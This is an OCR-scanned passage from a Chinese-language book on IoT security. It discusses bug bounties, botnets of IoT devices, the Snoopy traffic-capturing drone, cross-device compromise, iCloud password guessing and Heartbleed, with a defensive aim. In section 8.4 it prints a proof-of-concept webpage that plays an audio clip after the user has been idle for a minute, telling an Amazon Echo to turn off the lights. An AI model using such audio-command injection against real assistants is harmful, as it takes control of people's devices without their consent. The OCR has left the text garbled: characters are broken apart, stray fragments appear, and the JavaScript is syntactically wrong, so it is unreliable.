家 赋予 其 他 人 的 访问 权限 。 孩 子 从 学 校 回 到 家 中 可 以 使 用 他 们 的 iPhone 开门 ， 但 不 应 该 允许 其 他 人 进门 。 访 问 特 定 物 联 网 设备 也 应 该 有 基于 时 间 和 使 用 了 智能 电话 孩子 的 GPS 
定位 设备 的 限制 ，GPS 可 追踪 孩子 的 信息 。 


最 终 ， 技 术 会 将 孩子 置 于 危险 境地 ， 引 发 暴力 ， 但 是 也 可 以 用 来 监控 保护 孩子 的 安全 。 重 要 的 是 ， 产 品 设计 人 员 应 当 考 虑 到 要 确保 他 们 能 够 帮助 孩子 ， 将 他 们 引导 到 更 安 
全 更 健康 的 生活 环境 中 ， 要 对 类 似 网 络 暴力 的 真实 威胁 负 起 责任 来 。 


7.38 掠夺 者 


已 经 有 很 多 不 幸 的 例子 ， 孩 子 遭 到 掠夺 者 的 “培训 ”和 性 骚扰 ， 掠 夺 者 使 用 在 线 论坛 和 即时 消息 来 发 现年 幼 的 交流 对 象 。 与 网 络 暴力 相似 ， 这 些 坏蛋 也 会 利用 包括 物 联 网 
设备 这 样 的 技术 来 与 未 成 年 人 接触 和 交流 。 


设备 制造 商 有 无 可 推卸 的 责任 来 实现 并 鼓励 家 长 恰当 地 使 用 产品 的 控制 特性 ， 保 护 孩 子 远离 可 疑 的 行为 ， 以 及 建立 起 当 发 现 可 疑 行为 时 及 时 向 家 长 报警 的 机 制 。 举 一 个 例 
子 ， 孩 子 可 能 会 与 陌生 人 沟通 如 何在 智能 电视 上 安装 应 用 程序 ， 家 长 应 当 监 控 和 控制 这 类 行为 。 对 于 其 他 威胁 代理 ， 产 品 设 计 人 员 应 当 分 析 他 们 的 目标 受众 可 能 是 哪些 人 ， 当 
产品 有 可 能 被 小 孩 使 用 时 ， 为 家 长 提供 嵌入 锁定 功能 的 方法 。 


74 bug 奖励 计划 


高 级 技术 人 员 和 安全 研究 人 员 经 常会 花 时 间 和 资源 去 发 现 一 些 安全 漏洞 。 有 时 候 ， 漏 洞 是 意外 发 现 的 ， 然 而 大 多 数 情况 下 ， 研 究 人 员 会 为 发 现 了 安全 问题 而 感到 满足 。 研 
究 人 员 很 多 时 候 想 要 做 好 事 ， 向 产品 厂商 报告 他 们 发 现 的 漏洞 。 有 些 公司 会 发 布 广告 ， 告 诉 人 们 如 果 发 现 了 安全 漏洞 如 何 来 联系 他 们 。 这 非常 好 ， 但 是 很 多 公司 则 不 然 。 这 会 
导致 研究 人 员 联 系 客户 支持 人 员 ， 而 客户 支持 人 员 无 法 把 信息 传递 给 正确 的 人 。 


2013 年 ， 一 名 研究 人 员 试 图 向 Facebook 报 告 一 个 安全 问题 ， 该 问题 允许 任何 人 可 以 在 其 他 人 的 Facebook 页 面 上 发 布 信息 (即使 他 们 互 不 认识 ) 。 实 际 上 ,研究 人 员 是 
按照 Facebook 自 己 报告 安全 漏洞 的 方式 来 报告 问题 的 ， 但 是 Facebook 的 安全 团队 给 出 响应 确 是 : “对 不 起 ， 这 并 不 是 一 个 bug。” 该 研究 人 员 随 后 将 漏洞 的 详情 发 送 到 首席 
执行 官 Mark Zuckerberg 的 Facebook 主 页 上 。 几 分 钟 后 ，Facebook 安 全 工程 团队 联系 了 研究 人 员 并 和 他 一 起 了 解 并 修复 了 漏洞 。 


微软 这 样 的 公司 已 经 建立 了 bug 奖 励 计 划 ， 根 据 发 现 漏洞 的 严重 程度 ， 给 予 研究 人 员 最 高 10 万 美元 的 奖励 。 如 此 高 奖励 的 回报 ， 企 业 不 得 不 向 专注 于 高 精 尖 技术 研究 并 提 
交 bug 信 息 的 员工 或 承包 商 提供 同样 数量 甚至 更 多 的 奖励 。 依 据 问题 的 严重 性 进行 分 类 ， 也 很 容易 达成 公司 和 股东 降低 风险 的 目标 。 


还 有 一 些 公 司 ， 比 如 HackerOne (如 图 7-32 所 示 ) ， 他 们 推进 并 协调 了 bug 奖 励 计 划 。 公 司 可 以 加 入 到 该 计划 当中 ， 使 用 HackerOne 网 站 获取 研究 人 员 的 安全 问题 报 
告 。HackerOne 声 称 ， 他 们 不 会 看 真实 的 漏洞 报告 ， 因 为 这 是 报告 漏洞 的 研究 人 员 和 被 报告 漏洞 的 公司 之 间 的 私人 沟通 。 一 旦 问题 解决 了 ，HackerOne 会 帮助 公司 向 公众 公 
开 漏 洞 。 
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图 7-32: HackerOne 网 站 上 最 新 的 支付 给 研究 人 员 的 bug 奖 励 


物 联 网 厂商 要 为 提交 漏洞 发 现 的 研究 人 员 建 立 一 个 机 制 ， 这 是 极其 重要 的 。 如 果 没 有 一 个 明晰 的 过 程 ， 没 有 几 个 研究 人 员 会 花费 时 间 报 告 他 们 的 漏洞 。 即 使 不 是 所 有 的 公 
司 都 会 提供 奖励 ， 也 要 让 企业 有 意识 去 这 么 做 ， 因 为 这 会 鼓励 研究 人 员 在 公司 产品 被 黑客 利用 之 前 发 现 漏洞 ， 降 低 了 问题 在 修复 之 前 就 被 公开 的 可 能 | 反之 ， 用 户 信息 、 
安全 和 业务 收入 都 会 处 于 危险 的 境地 。 


7.5 “小结 


本 章 开始 就 介绍 了 littleBits 平 台 ， 借 助 这 一 平台 ， 我 们 快速 轻松 地 设计 了 我 们 自己 的 短信 门铃 原型 。 我 们 可 以 利用 IFTTT 平 台 让 设备 具备 发 送 短信 息 的 能 力 。 在 原型 完成 
之 时 ， 我 们 已 经 能 够 发 现存 在 与 WiFi、 设 备 命令 执行 相关 的 安全 问题 ， 以 及 使 用 cloudBit 所 获取 的 访问 令 牌 持久 性 认证 和 授权 查询 及 指令 安全 问题 。 即 使 littleBits 平 台 仅 用 于 
设计 初始 原型 ， 它 在 设计 的 早期 发 现 安全 问题 也 是 非常 有 用 的 。 我 们 知道 ， 在 设计 的 早期 实施 安全 策略 ， 比 后 期 试图 修补 安全 问题 更 容易 也 更 便宜 。 


我 们 还 了 解 到 ， 人 们 可 能 会 通过 自 改 硬件 调试 接口 来 获取 功能 访问 权 ， 这 会 导致 产品 的 完整 性 和 机 密 性 遭 到 破坏 。 这 种 情况 会 将 整个 产品 线 的 用 户 置 于 危险 境地 ， 比 如 
LIFX 照 明 系 统 的 例子 ， 他 们 将 公司 所 有 设备 的 通用 对 称 加密 密 钥 暴露 给 了 公众 。 


如 我 们 所 见 ， 即 使 在 原型 阶段 ， 认 真 对 待 不 同 威胁 代理 利用 漏洞 的 方式 也 是 极其 重要 的 。 例 如 ， 一 个 心怀 不 满 的 客户 支持 雇员 ， 拥 有 联网 汽车 所 在 位 置 的 访问 权限 ， 会 将 
某 些 拥有 这 种 汽车 的 著名 人 士 的 GPS 数据 公布 出 来 ， 以 焉 污 雇主 的 声誉 。 另 一 方面 ， 黑 客 激进 分 子 可 能 会 以 某 些 特定 与 他 们 政治 诉求 相左 的 人 的 物 联网 设备 作为 攻击 目标 ， 来 
引起 服务 混乱 ， 暴 露 攻 击 目标 的 个 人 隐私 。 


联网 设备 的 体系 结构 和 设计 也 是 技术 专家 和 安全 设计 人 员 感 兴趣 的 方面 。 对 于 物 联网 厂商 来 讲 ， 提 供 早 期 供 人 们 汇报 安全 问题 的 明确 公告 是 非常 重要 的 ， 并 且 制 定 奖励 政 
策 ， 核 实 问题 并 提供 报酬 也 是 很 有 必要 的 。 大 多 数 情 况 下 ， 奖 励 的 花费 比 出 现 问题 之 后 挽回 负面 影响 、 挽 救 用 户 的 隐私 与 信任 所 花费 的 代价 要 便宜 得 多 。 


第 8 章 ”未 来 的 安全 一 一 对 话 将 来 的 攻击 方式 


自从 互联 网 的 曙光 到 来 ， 我 们 看 到 新 的 攻击 和 威胁 方式 已 经 进入 技术 范畴 。 许 多 威胁 已 经 向 着 几乎 可 预测 的 方式 发 展 。 但 是 我 们 周围 的 世界 已 经 越 来 越 依 赖 互 联 设备 ， 对 
我 们 来 说 ， 重 要 的 是 思考 未 来 我 们 所 要 面 对 的 威胁 。 


limi 


到 目前 为 止 ， 我 们 已 经 看 到 了 和 特定 设备 有 关 的 安全 漏洞 和 安全 原则 。 我 们 已 经 学 到 了 很 多 关于 已 经 存在 于 消费 者 市 场 的 物 联网 设备 的 安全 现状 。 我 们 知道 今天 所 做 的 事 
情 是 错误 的 ， 需 要 改进 未 来 设备 的 安全 性 。 


我 们 具有 不 断 变化 的 威胁 范畴 的 知识 ， 也 有 困扰 着 并 继续 困扰 计算 系统 和 物 联 网 设备 的 安全 漏洞 知识 ， 在 这 些 良好 的 知识 基础 上 ， 能 够 预测 出 可 能 会 到 来 的 情况 。 由 于 使 
用 案例 为 物 联网 产品 发 展 服务 ， 新 的 攻击 途径 将 出 现 。 本 章 基 于 我 们 对 物 联网 设备 在 未 来 是 如 何 满足 我 们 需要 的 理解 的 基础 上 ， 我 们 预测 一 些 假想 的 攻击 情况 。 


8.1 thingbots 时 代 已 经 到 来 


僵尸 网 络 由 已 经 被 僵尸 拥有 者 入 侵 的 和 控制 的 工作 站 组 和 多 人 台 笔 记 本 电脑 组 成 。 通 常情 况 下 ， 这 些 设备 容易 被 通过 电子 邮件 发 送 给 受害 者 的 恶意 软件 、 钓 鱼网 站 ， 或 利用 
漏洞 编写 的 蠕虫 软件 所 感染 。 一 个 简单 僵尸 网 络 由 成 百 上 干 的 设备 组 成 ， 通 过 控制 从 被 感染 的 机 器 发 送 到 指定 目标 的 流量 ， 给 僵尸 网 络 拥 有 者 提供 强大 的 能 力 对 另 一 个 网 络 进 
行 拒绝 服务 攻击 。 僵 尸 网 络 也 被 用 来 窃取 私人 信息 ， 如 信用 卡号 码 、 银 行 、 电 子 邮 件 账 户 赁 证 等 。 


术语 thingbots 用 于 网 络 安全 研究 工业 描述 僵尸 网 络 ， 包 括 被 感染 的 物 联 网 设备 ， 这 些 物 联网 设备 也 能 够 用 来 发 送 攻击 和 窃取 私人 信息 。2014 年 ， 一 项 研究 证 明 发 现 : 从 
100000 台 寄主 设备 上 发 送 多 达 750000 条 钓鱼 网 站 和 垃圾 短信 。 


thingbots 拥 有 者 可 能 会 利用 物 联网 设备 窃取 他 们 以 前 无 法 访问 的 信息 ， 例 如 通过 被 感染 的 智能 电视 获取 私人 谈话 。 他 们 也 有 能 力 控制 干 万 家 庭 的 电子 锁 和 电灯 。 


随 着 更 多 的 物 联网 设备 开始 上 线 ， 由 thingbots 产 生 的 大 量 攻击 只 会 增加 ， 威 胁 代理 将 会 增加 我 们 的 私人 信息 的 获取 ， 以 及 引发 生活 中 的 物理 中 断 的 能 力 。 这 意味 着 : 当 
我 们 展望 未 来 ， 本 书 所 讨论 的 解决 物 联网 相关 漏洞 类 别 将 变 得 更 加 紧迫 。 


8.2 无 人 机 的 崛起 


无 人 机 (UAV) 主流 媒体 称 无 人 机 是 飞机 上 没有 驾驶 员 的 飞机 。 无 人 机 有 各 种 不 同 的 类 型 ， 履 盖 范 围 广阔 ， 大 的 有 军用 级 别 无 人 机 ， 还 有 用 于 娱乐 用 途 (如 摄影 的 无 人 
机 ) 。 


在 2014 年 新 加 坡 黑 帽 大 会 上 ， 研 究 者 Glenn Wilkinson 公 布 了 一 个 概念 证 明 (proof-of-concept) 工具 叫 Snoopy: 一 架 直 升 机 有 两 个 附加 摄像 机 ， 使 用 一 台 机 载 计算 
机 、 一 个 GPS 模块 和 一 个 GSM 蜂 窝 单 元 ， 可 以 在 限定 区 域内 跟踪 目标 ， 捕 获 无 线 网 络 流量 。 除 了 无 线 WiFi 网 络 ， 该 工具 也 能 利用 蓝牙 和 射频 识别 (RFID) 跟踪 设备 和 它们 拥 
有 的 网 络 流量 。 


Snoopy 软 件 通过 追踪 设备 的 网 络 探头 进行 工作 ， 例 如 智能 手机 在 不 断 搜索 他 们 以 前 接 入 过 的 WiFi 网 络 。Snoopy 无 人 机 提供 与 被 探测 到 的 网 络 同名 的 WiFi 网 络 。 当 智能 
机 加 入 这 个 网 络 ，Snoopy 代 理 网 络 流量 就 能 够 捕获 用 户 手机 传输 的 数据 。 除 了 手机 ，Snoopy 也 能 够 捕获 设备 数据 ， 例 如 使 用 WiFi 的 心脏 起 搏 器 ， 以 及 健身 器 材 和 智能 卡 。 


无 人 机 能 够 装载 这 款 软件 飞越 整个 城市 ;Snoopy 被 设计 用 来 获取 网 络 数据 ， 并 发 送 到 远程 服务 器 ， 无 人 机 的 拥有 者 只 需 在 一 个 地 方 进行 数据 分 析 。 对 于 那些 有 零星 蜂窝 
信号 覆盖 的 地 方 ， 可 以 部 署 一 个 单独 的 无 人 机 盘旋 和 获取 网 络 流量 ， 与 此 同时 ， 其 他 的 无 人 机 可 以 被 派 去 定期 收集 捕获 的 数据 ， 并 把 它 带 回 给 攻击 者 。 无 人 机 还 包含 一 个 加 速 
器 ， 用 于 探测 是 否 已 经 被 第 三 方 抓获 。 一 旦 发 生 这 种 情况 ，Snoopy 能 够 通过 擦 除 无 人 机 上 的 计算 机 硬盘 内 容 来 实现 自我 摧毁 。 


研究 人 员 能 够 证 明 无 人 机 是 如 何 通过 从 手机 和 潜在 的 生命 维持 装置 (如 心脏 起 搏 器 ) 获取 的 信号 来 跟踪 人 的 ， 不 难 想象 ， 无 人 机 能 够 被 重金 资助 的 团体 (如 国家 政府 和 复 
杂 的 犯罪 团伙 ) 所 利用 。 无 人 机 在 军事 和 私人 领域 持续 发 展 ， 很 可 能 ， 无 人 机 能 够 被 各 种 团体 利用 以 获得 设备 和 网 络 的 访问 权限 。 在 本 书 中 ， 我 们 已 经 看 到 许多 不 同 的 物 联 网 
设备 的 实例 ， 一 旦 攻击 者 接 入 局 域 WiFi 网 络 ， 他 们 无 需 得 到 身份 验证 或 授权 。 现 在 已 经 有 许多 流行 的 物 联网 设备 ， 他 们 将 成 为 个 人 和 资金 充足 的 犯罪 团伙 的 目标 ， 他 们 的 目的 
是 获取 数据 ， 以 及 尽 可 能 威胁 人 们 的 生命 安全 。 


8.3 设备 交叉 攻击 


许多 人 每 天 都 在 使 用 一 系列 的 计算 设备 一 一 智能 手机 ， 个 人 和 雇主 发 放 的 笔记 本 电脑 和 工作 站 ， 平 板 电脑 一 一 完成 他 们 个 人 事物 和 专业 的 工作 。 很 多 时 候 ， 数 据 跨 越 多 个 
设备 ， 这 样 无 论 使 用 什么 设备 用 户 都 可 以 访问 所 有 的 信息 。 例 如 ， 用 户 将 手机 的 数据 备份 到 笔记 本 电脑 。 另 一 个 例子 是 使 用 如 iCloud 这 样 的 服务 ， 跨 设备 同步 文件 夹 、 应 用 设 
置 和 联系 方式 。 这 造成 了 一 种 情况 ， 攻 击 者 可 以 利用 一 个 已 经 被 攻击 的 设备 访问 存储 在 另外 一 台 设 备 或 者 通过 云 跨 设备 同步 的 信息 。 


想象 有 这 样 一 种 情况 : 一 位 病人 的 信息 由 医师 存储 在 Dropbox 上 。 如 果 医 师 的 台式 机 被 钓鱼 网 站 进行 破坏 ， 攻 击 者 将 修改 文档 内 容 ， 也 许 改变 用 药 的 计量 。 这 个 文档 可 能 
已 经 同步 更 新 到 其 他 设备 上 ， 例 如 ， 医 师 可 能 在 值班 的 时 候 使 用 的 平板 电脑 。 平 板 电 脑 可 能 被 配置 为 全 盘 加 密 ， 医 院 的 管理 者 配置 一 些 额外 的 安全 控制 ， 但 是 在 这 种 情况 下 ， 
这 些 安全 控制 可 能 是 无 效 的 ， 因 为 文档 已 经 在 医生 的 台式 机 电脑 中 被 破坏 ， 并 自动 更 新 到 笔记 本 相同 的 Dropbox 账 户 下 。 这 展示 了 : 在 用 户 生态 系统 中 ， 如 何 利用 一 台 被 破坏 
的 设备 给 其 他 设备 的 数据 整体 性 带 来 负面 影响 。 


存储 在 智能 手机 和 平板 电脑 上 的 本 地 备份 文件 可 能 存储 在 工作 站 和 笔记 本 电脑 上 ， 这 也 是 攻击 者 的 目标 。 第 4 章 我 们 分 析 了 用 于 smartThings iOS 应 用 程序 的 
access token 令 牌 ， 由 服务 器 成 功 认证 后 发 送 ， 有 效 期 是 18250 天 。 能 够 损坏 smartThings 用 户 的 工作 站 或 笔记 本 电脑 的 攻击 者 也 能 潜在 窃取 这 样 一 个 备份 文件 和 手机 
access token， 因 为 access token 的 有 效 期 很 长 ， 仍 然 能 够 使 用 。 


单个 用 户 使 用 的 设备 数量 越 多 ， 将 增加 攻击 范围 。 接 入 单个 设备 的 攻击 者 能 够 窃取 私人 信息 和 影响 数据 跨 设 备 同步 ， 也 能 窃取 用 户 控 制 物 联网 设备 的 信息 。 用 户 、 系 统管 
理 员 和 物 联 网 设备 及 应 用 程序 的 设计 者 应 该 思考 用 户 可 能 有 的 设备 生态 系统 ， 伴 随 着 可 能 发 生 的 代理 人 攻击 ， 构 建 解 决 方案 减 小 这 些 潜在 的 攻击 场景 。 


8.4” 听 声音 


在 2007 年 ， 微 软 因为 新 发 布 的 Windows Vista 操 作 系 统 的 语音 识别 组 件 的 安全 漏洞 而 遭 到 抒 击 。 恶 意 网 站 能 够 简单 播放 一 段 音频 文件 命令 计算 机 去 删除 文件 、 清 空 回收 
站 ， 操 作 系 统 会 欣然 接受 。 另外， 攻击 者 将 发 送 含有 音频 文件 的 邮件 给 受害 者 ， 引 诱 他 们 播放 音频 文件 。 微 软 淡化 了 这 个 风险 ， 声 明 这 样 的 攻击 要 取得 成 功 需要 满足 的 所 有 条 
件 是 不 可 能 的 。 此 外 ， 微 软 表示 ， 用 户 可 能 会 承认 遭 到 攻击 ， 因 为 他 们 会 听 到 音频 指令 播放 ; 然而， 这 是 假定 攻击 的 时 候 用 户 在 他 们 的 电脑 附近 ， 如 果 在 播放 音频 文件 之 前 使 
用 了 延迟 ， 情 况 可 能 就 会 不 同 了 。 


这 个 问题 没有 引起 用 户 足够 重视 ， 可 能 是 原因 不 是 很 多 人 利用 台式 机 和 笔记 本 电脑 的 语音 功能 (除了 受到 功能 损害 和 受到 相关 困难 影响 的 那些 人 ) 。 当 Vista 在 2007 年 发 
布 以 后 ， 用 户主 要 采用 键盘 、 鼠 标 和 触 控 板 作为 输入 方式 。 然 而 随 着 人 工 智 能 逐渐 兴起 ， 这 种 情况 正在 改变 ， 出 现 像 Siri 和 Cortana 这 样 的 声控 个 人 语音 助理 服务 。 用 户 开 始 用 
声音 控制 他 们 的 智能 手机 和 其 他 设备 ， 并 从 中 享受 和 找到 价值 。 


搭 上 数字 个 人 助理 的 顺风 车 ， 亚 马 逊 最 近 发 布 了 一 款 名 为 Echo (如 图 8-1 所 示 ) 的 产品 ， 它 主要 通过 声音 控制 ， 使 用 相应 的 智能 手机 应 用 程序 来 设置 。 


图 8-1: 3E Z Echo 


这 个 设备 有 9 英寸 [1 高 的 话 简 和 一 系列 麦克 风 ， 默 认 唤 醒 字 被 设置 成 “Alexa”。 正 如 Siri 一 样 ， 通 过 说 “Alexa， 今 天 天 气 如何 ? ”能 够 命令 Echo 告诉 你 天 气 ， 或 者 问 它 


一 些 琐碎 的 问题 ， 如 “Alexa，Michael Jackson 有 多 高 ?“ 


以 通 


Echo 也 可 以 配置 用 来 开关 飞利浦 电灯 泡 (如 第 1 章 讨论 的 ) 。 就 像 照 明 系 统 iOS 应 用 程序 ，Echo 应 用 程序 通过 按 下 网 桥 上 的 按键 来 证 明 拥有 权限 并 访问 照明 系统 网 桥 。 可 


过 选择 指定 的 hue 灯 放置 到 具体 的 组 来 进行 控制 (例如 Lights， 如 图 8-2 所 示 ) 。 


eeeee ATAT F CEP dI. | 


€ cett Log Out 


Add new devices 


Create group 


图 8-2: 17 个 hue 电 灯泡 组 成 的 组 叫 Lights 


此 时 ， 用 户 说 “Alexa， 关 掉 灯 ” ， 亚 马 逊 Echo 将 负责 任 地 将 17 萤 灯 关 闭 。 从 微软 Vista 安 全 问题 学 到 : 我 们 能 很 容易 模拟 概念 证 明 的 场景 ， 网 站 播放 一 个 音频 文件 指导 
Alexa 关 灯 。 看 看 下 面 这 个 网 站 的 JavaScript 代 码 : 


<HTML> 
<BODY> 
<SCRIPT> 
var IDLE TIMEOUT = 60; //in seconds 
var _idleSecondsCounter = 0; 


document.onclick = function () 


idleSecondsCounter = 0; 


document .onmousemove = function () 


idleSecondsCounter = 0; 


document .onkeypress = function () 


idleSecondsCounter = 0; 


window.setInterval (CheckIdleTime, 1000); 


function CheckIdleTime|() 
( 
. idleSecondsCountert*; 


if ( idleSecondsCounter »- IDLE TIMEOUT) 
{ 


var audio = new Audio('alexa lights off.m4a'); 
audio.play(); 


 .idleSecondsCounter = 0; 
) 
} 
</SCRIPT> 
</BODY> 
</HTML> 


这 有 段 JavaScript (原版 本 从 http://stackoverflow.com/a/13246534 获 得 ， 并 进行 了 少许 修改 ) 显示 : 当 浏 览 器 注意 到 没有 鼠标 或 键盘 操作 60 秒 后 ， 播 放 音频 文件 
alexa_lights_off.m4a。 音 频 文件 中 包含 词 “Alexa， 关 灯 。” 这 个 概念 基本 显示 了 外 部 网 站 是 如 何 使 用 像 Amazon Echo 这 样 的 音频 助手 来 影响 设备 连接 的 。 


回 到 2007 年 ， 网 络 安全 社区 对 Windows Vista 的 安全 问题 不 是 特别 感 兴趣 ， 因 为 攻击 者 拉 他 下 水 的 潜在 影响 和 可 能 性 看 起 来 特别 低 (声音 激活 功能 需要 打开 ， 麦 克 风 需要 
靠近 说 话 者 ) 。 然 而 ,今天 越 来 越 多 的 人 依赖 像 Echo 这 样 基于 语音 的 个 人 助手 。 一 些 用 户 依赖 像 Echo 这 样 的 设备 控制 电灯 这 样 的 物 联网 设备 ， 能 够 导致 用 户 物理 安全 的 冲 
击 。 使 得 这 种 攻击 途径 越 来 越 受 关注 。 


亚马逊 Echo 也 能 和 IFTTT 方 法 一 起 使 用 ， 能 够 控制 WeMo 开 关 (在 第 3 章 讨 论 过 ) 。 这 使 得 Echo 成 为 强大 的 设备 ， 不 仅 能 控制 家 中 的 电灯 ， 还 能 控制 一 系列 电子 设备 。 
Echo 仅仅 允许 用 户 选 择 “Alexa” 或 “Amazon” 作 为 唤醒 口令 ， 并 为 每 个 命令 发 出 的 第 一 个 词 ， 以 便 Echo 了 解 用户 对 设备 的 意图 。 如 果 亚 马 逊 需要 用 户 选 择 一 个 独特 的 唤醒 
词 ， 我 们 概念 证 明 的 基础 将 被 打破 。 当 然 ， 威 胁 代理 例 如 不 怀 好 意 的 邻居 或 恶意 团体 能 够 通过 智能 电视 的 相机 进行 窃听 ， 可 以 找 出 设置 的 唯一 唤醒 词 。 但 是 ， 这 基本 上 能 够 限 
制 来 自 威胁 代理 的 风险 使 代理 人 不 能 访问 到 信息 。 


像 Echo 这 样 的 产品 设计 者 应 该 考虑 恶意 软件 的 行为 ， 利 用 音频 作为 攻击 途径 的 实施 频段 ， 因 为 这 些 产品 被 设计 成 主要 使 用 音频 通信 。 语 音 识 别 安全 漏洞 在 过 去 没有 得 到 
应 有 的 关注 ， 但 是 产品 设计 和 使 用 者 应 该 意识 到 ， 随 着 我 们 不 断 增加 对 Echo 这 样 的 助手 的 依赖 ， 浊 用 音频 频段 的 途径 会 不 断 扩大 。 


[1 英寸 二 0.0254 米 。 


8.5 物 联网 云 基础 设施 攻击 


提供 互联 网 连接 的 设备 需要 支持 云 基础 设施 。 我 们 已 经 看 到 ， 使 用 iOS 应 用 程序 可 以 控制 世界 上 任何 地 方 的 hue 照 明 系 统 。 我 们 也 看 到 ， 通 过 亚马逊 云 服 务 托管 的 支持 基 
础 设施 可 以 远程 访问 WeMo 婴 儿 监控 器 。 此 外 ， 使 用 iOs 应 用 程序 可 以 保持 特 斯 拉 S 型 与 特 斯 拉 的 基础 设施 持续 的 蜂 写 连 接 以 获得 空中 更 新 ， 发 送 诊断 信息 ， 并 接受 控制 。 物 
联网 设备 如 此 依赖 云 基础 设施 导致 了 其 成 为 滥用 的 目标 。 


2014 年 年 未 ， 黑客 入 侵 了 一 些 名 人 的 iCloud 账 户 ， 将 他 们 的 隐私 照片 和 视频 公之于众 。 针 对 iCloud 目 标 账 户 ， 黑 客 尝试 各 种 密码 组 合 直 到 | 狂 到 正确 的 。 因 为 大 多 数 
iPhone 用 户 选择 使 用 iCloud 服 务 跨 设备 同步 他 们 的 照片 和 视频 ， 攻 击 者 在 登录 后 便 能 获取 这 些 图 像 。 


虽然 没有 发 现实 际 的 安全 漏洞 在 iCloud 服 务 中 被 利用 ， 但 攻击 者 能 够 简单 地 获得 访问 权限 ， 原 因 是 : 在 给 定时 间 范 围 内 登录 失败 次 数 太 多 ， 服 务 没有 锁定 账号 。 


名 人 侵犯 事件 表明 : 现在 对 攻击 者 来 说 ， 使 用 静态 密码 获取 对 私人 信息 的 访问 权限 非常 容易 。 复 杂 的 物 联网 设备 (例如 Tesla Model S) 也 使 用 静态 密码 ， 这 样 密码 更 容 
易 猜 出 ， 攻 击 者 可 以 追踪 汽车 ， 开 汽车 锁 ， 甚 至 发 动 汽车 开 走 。 


除了 物 联网 制造 商 自 己 的 云 基础 设施 之 外 ， 像 IFTTT 和 苹果 HomeKit 这 类 平台 也 是 潜在 的 攻击 对 象 。 我 们 已 经 看 到 ， 通 过 灯泡 和 门 锁 这 样 的 物 联 网 设备 可 以 很 容易 地 连接 
到 在 线 空间 ， 例 如 邮件 和 社交 网 络 。 攻 击 者 能 够 入 侵 一 些 人 的 IFTTT 账 户 ， 控 制 所 有 绑 定 到 受害 者 账户 的 虚拟 和 物理 服务 。 


另 一 个 例子 是 内 置 到 iOS 系 统 中 的 苹果 HomeKit 服 务 ， 将 引起 攻击 者 的 兴趣 。HomeKit 服 务 允 许 物 联网 设备 制造 商 与 苹果 设备 无 颖 工作 ， 甚 至 允许 用 户 远程 控制 他 们 的 设 
备 。HomeKit 的 目的 是 让 用 户 设置 新 的 设备 更 加 简单 ， 然 后 使 用 Siri 来 控制 他 们 。 其 他 像 谷歌 和 微软 这 样 的 大 型 软件 公司 也 使 用 HomeKit 这 样 的 框架 ， 结 果 是 出 现 了 基于 用 户 
的 物 联 网 设备 。 这 些 框架 和 服务 之 所 以 变 得 流行 ， 是 因为 它们 允许 用 户 无 颖 连接 和 控制 他 们 的 物 联网 设备 。 苹 果 公司 已 经 制定 了 明确 的 指导 方针 ， 声 明 使 用 HomeKit 的 开发 者 
不 能 将 从 应 用 程序 接口 收集 到 的 数据 用 于 商业 和 数据 挖掘 。 然 而 ， 网 络 安全 研究 人 员 和 恶意 软件 攻击 者 (包括 那些 可 以 使 用 这 些 系统 的 心怀 不 满 的 员工 ) 会 被 潜在 的 漏洞 所 吸 
引 ， 这 样 的 服务 会 被 利用 来 获取 受害 者 家 中 各 种 设备 的 数据 。 


近 几 年 ， 云 服务 的 破坏 已 经 导致 了 受害 者 隐私 权 的 丧失 ， 却 给 攻击 者 带 来 了 经 济 利益 。 在 不 久 的 将 来 ， 攻 击 者 将 会 研究 采用 云 服务 获得 访问 权限 和 波 用 物 联 网 设备 的 功 
能 ， 进 一 步 入 侵 我 们 的 隐私 ， 也 可 能 会 威胁 我 们 的 人 身 安全 。 


8.6 JA] 


已 经 有 各 种 关于 美国 国家 安全 局 (NSA) 截获 像 网 络 路 由 和 种 植 后 门 之 类 的 设备 的 报道 。 (后 门 是 一 种 软件 或 者 硬件 修改 器 ， 人 允许 修改 器 远程 监控 和 控制 设备 。) 美国 政 
府 机 构 已 经 积极 游说 广大 硬件 和 软件 厂商 建立 机 制 ， 人 允许 执 法 机 构 从 个 人 设备 (如 智能 手机 ) 中 监控 和 获取 数据 ， 这 些 厂 商 包括 苹果 、 谷 歌 和 微软 等 。 


威胁 代理 能 够 影响 的 资源 数量 是 清晰 的 ， 他 们 能 够 影响 建立 在 物 联网 设备 中 的 后 门 。 一 县 后 门 的 存在 得 以 公开 ， 互 相 竞 争 的 攻击 者 和 威胁 代理 也 将 搜索 并 利用 这 些 后 门 。 


87 ”潜伏 的 Heartbleed 


Heartbleed 是 OpenSSL 库 的 安全 漏洞 ， 能 够 被 远程 利用 获取 访问 目标 设备 的 内 存 ， 其 中 包含 存储 的 数据 ， 如 加 密 密 钥 和 用 户 凭据 。OpenSSL 是 非常 流行 的 库 ， 数 以 百 万 
计 的 设备 都 用 它 来 实现 传输 层 安 全 (TLS) 协议 以 便 安 全 加 密 电子 通信 。 


Heartbleed 于 2014 年 4 月 1 日 向 开发 者 通报 ， 在 披露 之 时 ， 约 17% 面 向 互联 网 的 网 络 服务 器 ( 约 一 百 万 左右 ) 受到 漏洞 攻击 。Bruce Schneier 是 一 位 知名 的 安全 专家 ， 描 
述 Heartbleed 带 来 “灾难 性 ”问题 : 攻击 者 很 容易 利用 它 远 程 窃取 信息 。 


除了 工作 站 ， 物 联网 设备 (例如 Nest 恒 温 箱 ) 也 采用 OpenSSL。 意 识 到 这 个 安全 问题 ，Nest 公 司 针 对 恒温 箱 产品 发 布 了 一 个 更 新 ， 并 建议 已 经 遭 到 入 侵 的 客户 更 改 Next 
设备 的 密码 (如 图 8-3 所 示 ) 。 


e-^e & nest.com/support/article/How- © 


How is Nest addressing the OpenSSL 
Heartbleed security issue? 


Nest used a version of the OpenSSL library with the Heartbleed bug, which 
may have affected the Nest Thermostat and the Nest app. Nest Protect was 
not affected by the Heartbleed bug. We've already deployed a software 
update to fix the issue for the Nest Thermostat and apps. We also 
recommend that you change your Nest Account password. 


We're committed to protecting your security, and we believe that your 
personal information and data have not been compromised through the 
recent OpenSSL flaw. 


The Heartbleed bug, a serious vulnerability in OpenSSL, was discovered on 
April 7, 2014. OpenSSL is a common security protocol that is used to keep 
your internet communications private. We want to update you about how this 


affects Nest, what we're doing about it, and what you should do about it. 


图 8-3: Nest 支 持 网 站 详细 介绍 了 Heartbleed 的 安全 问题 


Heartbleed 向 我 们 证 明 : 远程 可 利用 的 漏洞 ， 这 一 潜在 的 灾难 性 特性 能 够 突然 将 数 以 万 计 的 物 联网 设备 置 于 风险 之 中 ， 因 为 他 们 采用 了 有 缺陷 的 源 代 码 。 另 外 必须 记 住 的 
